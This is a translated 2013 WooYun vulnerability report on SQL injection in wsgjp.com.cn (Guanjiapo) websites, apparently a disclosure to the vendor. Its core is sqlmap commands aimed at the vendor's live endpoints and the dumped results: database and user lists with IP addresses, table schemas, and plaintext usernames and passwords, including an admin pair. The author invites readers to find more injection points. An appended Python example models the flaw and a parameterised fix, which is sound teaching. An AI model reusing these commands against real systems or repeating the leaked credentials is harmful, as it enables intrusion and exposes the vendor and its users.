
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2013-040482

Title: Wangshang Guanjiapo (网上管家婆) #1: SQL injection on one site leads to large-scale information disclosure

Vendor: wsgjp.com.cn

Author: 爱上平顶山

Submitted: 2013-11-14 16:13

Fixed: 2013-12-29 16:14

Published: 2013-12-29 16:14

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2013-11-14: Details sent to the vendor; awaiting vendor handling
2013-11-14: Vendor confirmed; details visible to the vendor only
2013-11-24: Details disclosed to core white hats and domain experts
2013-12-04: Details disclosed to regular white hats
2013-12-14: Details disclosed to intern white hats
2013-12-29: Details disclosed to the public

Brief description:

0.0

Detailed description:

Guanjiapo (管家婆)
Injection points:
http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx (POST injection)
POST body: productId=10&companyName=q
http://bbs.mygjp.com/web/forum_search.aspx?text=1 (blind injection)
Exploiting with sqlmap:
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --dbs
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --current-db
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --users
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --tables -D "wsgjp_home"
Databases:
available databases [7]:
[*] mysql
[*] information_schema
[*] performance_schema
[*] agent
[*] narniahome
[*] wsgjp_bbs
[*] wsgjp_home
Users:
database management system users [202]:
[*] 'bjrepl'@'42.62.20.52'
[*] 'cactiuser'@'42.62.20.53'
[*] 'nagios'@'192.168.9.101'
[*] 'repl'@'192.168.9.4'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.9.1'
[*] 'root'@'192.168.9.2'
[*] 'root'@'42.62.20.53'
[*] 'root'@'localhost'
database management system users password hashes:
[*] bjrepl [1]:
password hash: Na******
[*] cactiuser [1]:
password hash: *8D812D06364E07D8C37BE124B1A2*******2AA7
[*] nagios [1]:
password hash: *8D812D06364E07D8C37BE124B1A2******22AA7
[*] repl [1]:
password hash: Na******
[*] root [7]:
password hash: ca*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
Tables and columns:
Database: agent
[8 tables]
+------------+
| agentsinfo |
| checklog |
| news |
| product |
| star |
| support |
| trade |
| users |
+------------+
Database: agent
Table: users
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(4) |
| password | varchar(100) |
| permit | varchar(100) |
| username | varchar(20) |
+----------+--------------+
Database: agent
Table: users
[5 entries]
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | admini |
| 2 | lkr | 212042 |
| 4 | afe | 212042 |
| 5 | skx | 212042 |
| 6 | guofei | 123456 |
+----+----------+----------------------------------+
----------------------------------------------------
Database: wsgjp_bbs
[11 tables]
+-------------+
| blacklist |
| forum |
| links |
| logrecord |
| message |
| monderator |
| replies |
| replyremind |
| topic |
| ttype |
| users |
+-------------+
Database: wsgjp_bbs
Table: users
[9 columns]
+--------------+---------------+
| Column | Type |
+--------------+---------------+
| CompanyName | varchar(100) |
| Email | varchar(50) |
| ID | int(4) |
| IP | varchar(20) |
| PassWord | varchar(100) |
| PermitID | int(4) |
| RegisterDate | datetime |
| UserName | varchar(20) |
| UserPhoto | varchar(1000) |
+--------------+---------------+
------------------------------------------------
Database: narniahome
[98 tables]
+----------------------+
| activechargelog |
| admin |
| admintype |
| aftersalestype |
| afterserviceallotlog |
| afterservicelog |
| allcharge |
| applyinfo |
| assesstype |
| canclerecordlog |
| charge |
| chargelog |
| chargetype |
| clearpasslog |
| clienttrack |
| clienttype |
| clienttypejxc |
| commission |
| company |
| companymoduleinfo |
| customerallot |
| customersatelog |
| customerstate |
| customproblemtype |
| decemberactivelog |
| distributionrule |
| downloadlog |
| duty |
| dutylog |
| employee |
| forgetpassword |
| g6sy |
| g7questionnaire |
| goods |
| handlechargelog |
| handlestate |
| handseltimelog |
| hischargelog |
| loginlog |
| loginuser |
| lossandexpire |
| losscause |
| lossreason |
| lossreasonlog |
| lossrenewals |
| modifycompanynamelog |
| mytask |
| order |
| orderdetail |
| permitgroup |
| personalsellfollow |
| product |
| productmodule |
| productsuite |
| productsuite_detail |
| profile |
| proxy |
| proxykefu |
| record |
| recordlog |
| relationadminproduct |
| relationadmintype |
| residuallog |
| rollinfo |
| ruledetail |
| salegroup |
| servicelossreson |
| servicestate |
| servicestatistics |
| servicetype |
| shoptype |
| statistics |
| store_tmp_table |
| storeexpire |
| subscribe |
| subscribe_eshop5 |
| taobaoinfor |
| taobaoinfor_bak |
| taobaotmp |
| task |
| taskdetail |
| temp_checkes5 |
| tmp_company |
| tmp_effectuser |
| tmp_invalidate |
| tmp_table |
| tmptable_charge |
| tmptable_subscribe |
| train |
| traincompanys |
| traintype |
| userlogininfo |
| vbackmain |
| visitbacklog |
| visitplan |
| visitplans |
| visittype |
| webserviceerrorlog |
+----------------------+
Database: narniahome
Table: admin
[19 columns]
+---------------+---------------------+
| Column | Type |
+---------------+---------------------+
| agentId | bigint(20) unsigned |
| fullname | varchar(200) |
| groupid | int(4) |
| id | bigint(20) unsigned |
| isadmin | int(4) |
| isassign | tinyint(1) |
| isautovisit | int(4) |
| iscustom | int(2) |
| isgroupleader | int(4) |
| ismaintenance | int(2) |
| istrainer | int(1) |
| isuse | int(4) |
| name | varchar(50) |
| password | varchar(50) |
| permit | varchar(200) |
| permits | varchar(500) |
| proxyid | int(4) |
| salegroupid | int(4) |
| type | int(4) |
+---------------+---------------------+
admin graspadmin
--------------------------------------------------
Database: wsgjp_home
[28 tables]
+-------------------------------+
| active |
| businessmodes |
| cases |
| chargecenterproductidcontrast |
| companys |
| coursewaretype |
| eleven_questionnaire |
| fridenlyink |
| helpbindproduct |
| helpsection |
| helptype |
| imageinfo |
| loginactive |
| loginlog |
| messages |
| novicehelp |
| product |
| product_feature |
| productprice |
| productsection |
| producttype |
| service |
| servicebindproduct |
| servicetypes |
| users |
| videoclassification |
| videos |
| videosection |
+-------------------------------+
Database: wsgjp_home
Table: users
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| CompanyID | bigint(20) unsigned |
| Email | varchar(100) |
| ID | bigint(20) unsigned |
| Nickname | varchar(100) |
| Password | varchar(200) |
| permit | varchar(500) |
| Username | varchar(100) |
+-----------+---------------------+
Stopping here.
OK, there are more injection points; check for them yourselves.

Proof of vulnerability:

As above.

Remediation:

Filtering.

Copyright notice: when reposting, credit the source: 爱上平顶山@乌云
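The report shows only the request (`productId=10&companyName=q` posted to `CheckCompanyName.ashx`) and sqlmap's output, not the handler's SQL. The following is an added example, not code from the report or from the vendor: it models a company-name lookup built two ways, by string concatenation (injectable, as the report demonstrates) and with bound parameters, and runs the kind of boolean-based probe sqlmap uses to detect a blind injection. The query text, the `companys` table layout and the sample rows are assumptions; sqlite3 stands in for the MySQL server the report enumerated.

```python
"""Added example (not from the WooYun report or the vendor's code).

Models the CheckCompanyName.ashx lookup two ways and shows why a
TRUE/FALSE tautology pair distinguishes an injectable parameter.
Table, columns, query text and rows are assumptions; sqlite3 stands
in for MySQL.
"""
import sqlite3

# Constructed sample data standing in for the wsgjp_home `companys` table
# listed in the report; the column names and rows are made up.
SAMPLE_ROWS = [
    (1, 10, "Example Trading Co"),
    (2, 10, "q"),
    (3, 20, "Another Shop"),
]


def make_db():
    """In-memory stand-in for the backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE companys (id INTEGER, productId INTEGER, companyName TEXT)"
    )
    conn.executemany("INSERT INTO companys VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def check_company_name_vulnerable(conn, product_id, company_name):
    """String-concatenated query: the POST values become part of the SQL text,
    so a quote in companyName closes the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id FROM companys WHERE productId = " + product_id
        + " AND companyName = '" + company_name + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def check_company_name_safe(conn, product_id, company_name):
    """Parameterised query: values are bound by the driver and never parsed
    as SQL. productId is also type-checked instead of being pasted in."""
    if not product_id.isdigit():
        return []
    sql = "SELECT id FROM companys WHERE productId = ? AND companyName = ?"
    return [row[0] for row in conn.execute(sql, (int(product_id), company_name))]


def boolean_blind_probe(conn, handler):
    """sqlmap-style boolean check: append a TRUE and a FALSE tautology to a
    known-good value. If the two responses differ, the parameter is injectable;
    a safe handler treats both strings as literal names and returns the same
    (empty) result for each."""
    truthy = handler(conn, "10", "q' AND '1'='1")
    falsy = handler(conn, "10", "q' AND '1'='2")
    return truthy != falsy


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal value:", check_company_name_vulnerable(db, "10", "q"))
    print("vulnerable, OR tautology:", check_company_name_vulnerable(db, "10", "q' OR '1'='1"))
    print("safe, OR tautology:     ", check_company_name_safe(db, "10", "q' OR '1'='1"))
    print("blind probe, vulnerable:", boolean_blind_probe(db, check_company_name_vulnerable))
    print("blind probe, safe:      ", boolean_blind_probe(db, check_company_name_safe))
```

The `OR '1'='1'` case returns every row because `AND` binds tighter than `OR`, which is how a single unvalidated field in one handler exposes the whole database. Input "filtering" of the kind the report's remediation names is fragile against encoding and quoting tricks; binding parameters removes the string-to-SQL boundary entirely, which is the fix a reviewer should look for in the `.ashx` handler.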


Vulnerability Response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2013-11-14 16:24

Vendor reply:

Thanks to @爱上平顶山 for the work.

Latest status:

None yet